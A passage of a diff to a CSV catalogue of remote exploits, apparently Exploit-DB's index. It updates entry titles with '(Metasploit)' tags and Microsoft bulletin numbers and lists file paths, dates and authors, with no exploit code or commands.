(2)",2011-10-09,Metasploit,windows,remote,0 17969,platforms/multiple/remote/17969.py,"Apache mod_proxy - Reverse Proxy Exposure (PoC)",2011-10-11,"Rodrigo Marcos",multiple,remote,0 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - (SVG layout) Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - Array.reduceRight() Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0 -17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (2)",2011-10-13,Metasploit,windows,remote,0 +17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,windows,remote,0 @@ -11075,11 +11084,11 @@ id,file,description,date,author,platform,type,port 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow",2012-01-10,b33f,windows,remote,0 18354,platforms/windows/remote/18354.py,"WorldMail IMAPd 3.0 - SEH Overflow (Egg Hunter)",2012-01-12,TheXero,windows,remote,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport - Remote Command Execution (Metasploit)",2012-01-17,Metasploit,windows,remote,0 -18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (Metasploit)",2012-01-14,Metasploit,windows,remote,0 +18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18367,platforms/windows/remote/18367.rb,"XAMPP - WebDAV PHP Upload (Metasploit)",2012-01-14,Metasploit,windows,remote,0 18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID - Buffer Overflow (Metasploit)",2012-01-14,Metasploit,linux,remote,0 18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit)",2012-01-14,Metasploit,bsd,remote,0 -18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)",2012-01-17,Metasploit,osx,remote,0 +18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)",2012-01-17,Metasploit,osx,remote,0 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder Buffer Overflow",2012-01-18,"Craig Freyman",windows,remote,0 18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager - 'ov.dll' _OVBuildPath Buffer Overflow (Metasploit)",2012-01-20,Metasploit,windows,remote,0 @@ -11089,7 +11098,7 @@ id,file,description,date,author,platform,type,port 18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow (Metasploit)",2012-04-04,Metasploit,windows,remote,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution Buffer Overflow (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server - magentservice.exe Overflow (Metasploit)",2012-01-27,Metasploit,windows,remote,0 -18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 +18426,platforms/windows/remote/18426.rb,"Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)",2012-01-28,Metasploit,windows,remote,0 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,windows,remote,0 18442,platforms/multiple/remote/18442.html,"Apache - httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0 @@ -11100,7 +11109,7 @@ id,file,description,date,author,platform,type,port 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object - GM_Song Structure Handling (Metasploit)",2012-02-16,Metasploit,windows,remote,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution (Metasploit)",2012-02-17,Metasploit,linux,remote,0 -18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012)",2012-02-24,Metasploit,windows,remote,0 +18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)",2012-02-24,Metasploit,windows,remote,0 18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow (Metasploit)",2012-02-23,Metasploit,windows,remote,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution (Metasploit)",2012-02-25,Metasploit,windows,remote,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 @@ -11127,7 +11136,7 @@ id,file,description,date,author,platform,type,port 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Root Remote Code Execution)",2012-05-26,muts,linux,remote,0 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0 18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 -18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0 +18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC Software DL-10 SR10 FTP Server (SR10.exe) - FTP USER Command Buffer Overflow (Metasploit)",2012-03-24,Metasploit,windows,remote,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow (Metasploit)",2012-03-26,Metasploit,windows,remote,0 @@ -11147,7 +11156,7 @@ id,file,description,date,author,platform,type,port 18759,platforms/windows/remote/18759.rb,"TFTP Server 1.4 (Windows) - ST WRQ Buffer Overflow (Metasploit)",2012-04-20,Metasploit,windows,remote,0 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player - ActionScript Launch Command Execution (Metasploit)",2012-04-20,Metasploit,linux,remote,0 18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x - WebDAV File Reading",2012-04-22,"Jelmer Kuperus",multiple,remote,0 -18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)",2012-04-25,Metasploit,windows,remote,0 +18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0 18779,platforms/hardware/remote/18779.txt,"RuggedCom Devices - Backdoor Access",2012-04-24,jc,hardware,remote,0 18833,platforms/windows/remote/18833.rb,"SolarWinds Storage Manager 5.1.0 - SQL Injection (Metasploit)",2012-05-04,Metasploit,windows,remote,0 18805,platforms/windows/remote/18805.txt,"McAfee Virtual Technician 6.3.0.1911 MVT.MVTControl.6300 - ActiveX GetObject() Exploit",2012-04-30,rgod,windows,remote,0 @@ -11166,7 +11175,7 @@ id,file,description,date,author,platform,type,port 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 - Virtual SAN Appliance Command Execution (Metasploit)",2012-05-21,Metasploit,hardware,remote,0 18915,platforms/windows/remote/18915.rb,"FlexNet License Server Manager - lmgrd Buffer Overflow (Metasploit)",2012-05-23,Metasploit,windows,remote,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 - Log Entry sprintf() Buffer Overflow (Metasploit)",2012-05-25,Metasploit,windows,remote,0 -18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (2)",2012-05-27,Metasploit,windows,remote,0 +18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2)",2012-05-27,Metasploit,windows,remote,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 - Command Execution (Metasploit)",2012-05-28,Metasploit,linux,remote,0 19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog 2.07.14 - Buffer Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0 @@ -11175,7 +11184,7 @@ id,file,description,date,author,platform,type,port 18973,platforms/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer - Multiple ActiveX BackupToAvi() Remote Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0 -19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (Metasploit)",2012-06-08,Metasploit,windows,remote,0 +19026,platforms/windows/remote/19026.rb,"Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)",2012-06-08,Metasploit,windows,remote,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows - OLE Object File Handling Remote Code Execution (Metasploit)",2012-06-06,Metasploit,windows,remote,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory - Remote Code Execution (Metasploit)",2012-06-10,Metasploit,windows,remote,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug exploit",1988-08-01,anonymous,linux,remote,0 @@ -11220,7 +11229,7 @@ id,file,description,date,author,platform,type,port 19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 - Security",1998-07-14,"Stefan Arentz",multiple,remote,0 19129,platforms/multiple/remote/19129.txt,"Microsoft IIS 4.0 / Microsoft Site Server 3.0 - Showcode ASP",1999-05-07,L0pht,multiple,remote,0 19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 -19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)",2012-06-14,Metasploit,windows,remote,0 +19141,platforms/windows/remote/19141.rb,"Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)",2012-06-14,Metasploit,windows,remote,0 19147,platforms/windows/remote/19147.txt,"Microsoft IIS4 (Windows NT) - Remote Web-Based Administration",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"Microsoft IIS4 (Windows NT) - Log Avoidance",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 - IISAPI Extension Enumerate Root Web Server Directory",1999-01-26,Mnemonix,windows,remote,0 @@ -11228,8 +11237,8 @@ id,file,description,date,author,platform,type,port 19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 - Invalid Byte Cross-Frame Access",1999-01-28,"Georgi Guninski",windows,remote,0 19402,platforms/hardware/remote/19402.txt,"Western Digital's WD TV Live SMP/Hub - Root Exploit",2012-06-26,"Wolfgang Borst",hardware,remote,0 19164,platforms/windows/remote/19164.txt,"Microsoft Internet Explorer 4 - Clipboard Paste",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 -19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4)",2012-06-15,Metasploit,windows,remote,0 -19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (Metasploit)",2012-06-16,Metasploit,windows,remote,0 +19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)",2012-06-15,Metasploit,windows,remote,0 +19186,platforms/windows/remote/19186.rb,"Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)",2012-06-16,Metasploit,windows,remote,0 19193,platforms/multiple/remote/19193.txt,"Allaire Forums 2.0.4 - Getfile",1999-02-11,"Cameron Childress",multiple,remote,0 19194,platforms/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files",1999-02-11,"Gary Geisbert",multiple,remote,0 19197,platforms/windows/remote/19197.txt,"Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client",1997-04-08,"Paul Ashton",windows,remote,0 @@ -11320,7 +11329,7 @@ id,file,description,date,author,platform,type,port 19555,platforms/hardware/remote/19555.pl,"Lucent Ascend MAX 5.0/Pipeline 6.0/TNT 1.0/2.0 Router - MAX UDP Port 9 Exploit (2)",1998-03-17,Rootshell,hardware,remote,0 19557,platforms/linux/remote/19557.txt,"John S.2 Roberts AnyForm 1.0/2.0 - CGI Semicolon",1995-07-31,"Paul Phillips",linux,remote,0 19558,platforms/linux/remote/19558.c,"OpenLink Software OpenLink 3.2 - Remote Buffer Overflow",1999-10-15,"Tymm Twillman",linux,remote,0 -19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL redirection",1999-10-18,"Georgi Guninski",windows,remote,0 +19559,platforms/windows/remote/19559.txt,"Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)",1999-10-18,"Georgi Guninski",windows,remote,0 19560,platforms/multiple/remote/19560.c,"Washington University WU-FTPD 2.5.0 - message Buffer Overflow",1999-10-19,typo/teso,multiple,remote,0 19561,platforms/windows/remote/19561.c,"True North Software Internet Anywhere Mail Server 2.3.x - Mail Server Multiple Buffer Overflow",1999-10-01,"Arne Vidstrom",windows,remote,0 19566,platforms/windows/remote/19566.c,"Omnicron OmniHTTPd 1.1/2.4 Pro - Buffer Overflow",1999-10-22,UNYUN,windows,remote,0 @@ -11340,7 +11349,7 @@ id,file,description,date,author,platform,type,port 19593,platforms/windows/remote/19593.c,"Real Networks GameHouse dldisplay ActiveX control - Port Buffer Overflow (2)",1999-11-04,"dark spyrit",windows,remote,0 19595,platforms/windows/remote/19595.c,"Computer Software Manufaktur Alibaba 2.0 - Multiple CGI Vulnerabilities",1999-11-03,Kerb,windows,remote,0 19603,platforms/windows/remote/19603.txt,"Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX CAB File Execution",1999-11-08,Mukund,windows,remote,0 -20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (Metasploit)",2012-07-31,Metasploit,windows,remote,8082 +20122,platforms/windows/remote/20122.rb,"Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)",2012-07-31,Metasploit,windows,remote,8082 20120,platforms/windows/remote/20120.pl,"httpdx 1.5.4 - Remote Heap Overflow",2012-07-29,st3n,windows,remote,0 19903,platforms/multiple/remote/19903.txt,"Gossamer Threads DBMan 2.0.4 - DBMan Information Leakage",2000-05-05,"Black Watch Labs",multiple,remote,0 19607,platforms/windows/remote/19607.c,"Microsoft Windows 95/98 - UNC Buffer Overflow (1)",1999-11-09,UNYUN,windows,remote,0 @@ -11398,7 +11407,7 @@ id,file,description,date,author,platform,type,port 19737,platforms/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,windows,remote,0 19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 - JavaScript Email Access",2000-02-01,"Georgi Guninski",windows,remote,0 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote,0 -19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal",2000-02-02,Mnemonix,multiple,remote,0 +19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,multiple,remote,0 19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit",2000-02-04,"Ussr Labs",windows,remote,0 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote,0 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",cgi,remote,0 @@ -11563,7 +11572,7 @@ id,file,description,date,author,platform,type,port 20164,platforms/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 20165,platforms/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 20168,platforms/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,php,remote,0 -20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (Metasploit)",2012-08-02,Metasploit,windows,remote,0 +20174,platforms/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)",2012-08-02,Metasploit,windows,remote,0 20176,platforms/cgi/remote/20176.pl,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (1)",2000-08-23,teleh0r,cgi,remote,0 20177,platforms/cgi/remote/20177.html,"CGI Script Center Subscribe Me Lite 2.0 - Administrative Password Alteration (2)",2000-08-23,n30,cgi,remote,0 20180,platforms/windows/remote/20180.c,"RobTex Viking Server 1.0.6 Build 355 - Buffer Overflow",2000-08-28,wildcoyote,windows,remote,0 @@ -11669,7 +11678,7 @@ id,file,description,date,author,platform,type,port 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 - sample script Exploit",1997-07-15,"Francisco Torres",cgi,remote,0 20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0 -20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - Index.dat",2000-11-23,"Georgi Guninski",windows,remote,0 +20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)",2000-11-23,"Georgi Guninski",windows,remote,0 20427,platforms/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - '.asx' Buffer Overflow",2000-11-22,@stake,windows,remote,0 20429,platforms/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 - JSP Source Disclosure",2000-11-23,benjurry,jsp,remote,0 20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 - CGI Input Handling",1998-03-03,"Niall Smart",cgi,remote,0 @@ -11917,7 +11926,7 @@ id,file,description,date,author,platform,type,port 20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure",2001-06-21,ViperSV,windows,remote,0 20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Show Path",2001-06-21,ViperSV,windows,remote,0 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support - Buffer Overflow",2001-06-21,"NSFOCUS Security Team",windows,remote,0 -20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Buffer Overflow (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0 +20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0 20954,platforms/linux/remote/20954.pl,"eXtremail 1.x/2.1 - Remote Format String (3)",2006-10-06,mu-b,linux,remote,0 21017,platforms/linux/remote/21017.txt,"Squid Web Proxy 2.3 - Reverse Proxy",2001-07-18,"Paul Nasrat",linux,remote,0 @@ -11963,7 +11972,7 @@ id,file,description,date,author,platform,type,port 21067,platforms/multiple/remote/21067.c,"Apache 1.0/1.2/1.3 - Server Address Disclosure",2001-08-21,magnum,multiple,remote,0 21068,platforms/cgi/remote/21068.txt,"SIX-webboard 2.01 - File Retrieval",2001-08-31,"Hannibal Lector",cgi,remote,0 21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus",linux,remote,0 -21080,platforms/multiple/remote/21080.rb,"JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)",2012-09-05,Metasploit,multiple,remote,0 +21080,platforms/multiple/remote/21080.rb,"JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)",2012-09-05,Metasploit,multiple,remote,0 21088,platforms/unix/remote/21088.pl,"AOLServer 3 - Long Authentication String Buffer Overflow (1)",2001-08-22,"Nate Haggard",unix,remote,0 21089,platforms/unix/remote/21089.c,"AOLServer 3 - Long Authentication String Buffer Overflow (2)",2001-09-05,qitest1,unix,remote,0 21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 - pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 @@ -11978,14 +11987,14 @@ id,file,description,date,author,platform,type,port 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0 21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 21116,platforms/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 -21118,platforms/windows/remote/21118.txt,"Microsoft Internet Explorer 5 - Zone Spoofing",2001-10-10,"kikkert security",windows,remote,0 +21118,platforms/windows/remote/21118.txt,"Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055)",2001-10-10,"kikkert security",windows,remote,0 21121,platforms/windows/remote/21121.pl,"Oracle9iAS Web Cache 2.0 - Buffer Overflow",2001-10-18,andreas,windows,remote,0 21125,platforms/cgi/remote/21125.pl,"Mountain Network Systems WebCart 8.4 - Command Execution",2001-10-19,root@xpteam.f2s.com,cgi,remote,0 21127,platforms/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 - JavaScript Interface Spoofing",2001-10-21,"Georgi Guninski",windows,remote,0 21128,platforms/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote,0 21129,platforms/cgi/remote/21129.java,"iBill Management Script - Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote,0 21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass (Metasploit)",2012-08-30,Metasploit,linux,remote,0 -21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (1)",2012-09-08,Metasploit,multiple,remote,0 +21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (Metasploit) (1)",2012-09-08,Metasploit,multiple,remote,0 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload (Metasploit)",2012-09-08,Metasploit,php,remote,0 21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0 21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0 @@ -12066,7 +12075,7 @@ id,file,description,date,author,platform,type,port 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,windows,remote,0 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",cgi,remote,0 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0 -21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure",2002-04-02,"GreyMagic Software",windows,remote,0 +21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)",2002-04-02,"GreyMagic Software",windows,remote,0 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0 21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 21365,platforms/linux/remote/21365.txt,"phpGroupWare 0.9.13 - Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0 @@ -12125,7 +12134,7 @@ id,file,description,date,author,platform,type,port 21541,platforms/windows/remote/21541.txt,"Microsoft SQL Server 2000 - SQLXML Script Injection",2002-06-12,"Matt Moore",windows,remote,0 21542,platforms/windows/remote/21542.c,"AnalogX SimpleServer:WWW 1.16 - Web Server Buffer Overflow",2002-06-13,"Auriemma Luigi",windows,remote,0 21548,platforms/cfm/remote/21548.txt,"ColdFusion MX - Missing Template Cross-Site Scripting",2002-06-13,Macromedia,cfm,remote,0 -40415,platforms/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution",2016-09-22,Metasploit,multiple,remote,0 +40415,platforms/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,multiple,remote,0 21554,platforms/windows/remote/21554.txt,"Imatix Xitami 2.5 - GSL Template Cross-Site Scripting",2002-06-14,"Matthew Murphy",windows,remote,0 21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",windows,remote,0 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",multiple,remote,0 @@ -12153,7 +12162,7 @@ id,file,description,date,author,platform,type,port 21607,platforms/windows/remote/21607.txt,"GoAhead WebServer 2.1.x - URL Encoded Slash Directory Traversal",2002-07-10,"Matt Moore",windows,remote,0 21608,platforms/windows/remote/21608.txt,"GoAhead WebServer 2.1.x - Error Page Cross-Site Scripting",2002-07-10,"Matt Moore",windows,remote,0 21611,platforms/windows/remote/21611.txt,"Summit Computer Networks Lil' HTTP Server 2.1/2.2 - pbcgi.cgi Cross-Site Scripting",2002-07-11,"Matthew Murphy",windows,remote,0 -21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address",2002-07-12,JWC,windows,remote,0 +21613,platforms/windows/remote/21613.txt,"Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)",2002-07-12,JWC,windows,remote,0 21614,platforms/freebsd/remote/21614.c,"ATPhttpd 0.4b - Buffer Overflow",2002-07-12,badc0ded,freebsd,remote,0 21615,platforms/windows/remote/21615.c,"Real Networks RealJukebox 1.0.2/RealOne 6.0.10 Player Gold - Skinfile Buffer Overflow",2002-07-12,UNYUN,windows,remote,0 21616,platforms/windows/remote/21616.txt,"Working Resources 1.7.3 BadBlue - Null Byte File Disclosure",2002-06-13,"Matthew Murphy",windows,remote,0 @@ -12214,7 +12223,7 @@ id,file,description,date,author,platform,type,port 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 - Encoded Backslash Directory Traversal",2002-08-22,"Auriemma Luigi",windows,remote,0 21748,platforms/windows/remote/21748.txt,"Microsoft Internet Explorer 5/6 Legacy Text Formatting - ActiveX Component Buffer Overflow",2002-08-22,"Mark Litchfield",windows,remote,0 21749,platforms/windows/remote/21749.txt,"Microsoft Internet Explorer 5/6 - XML 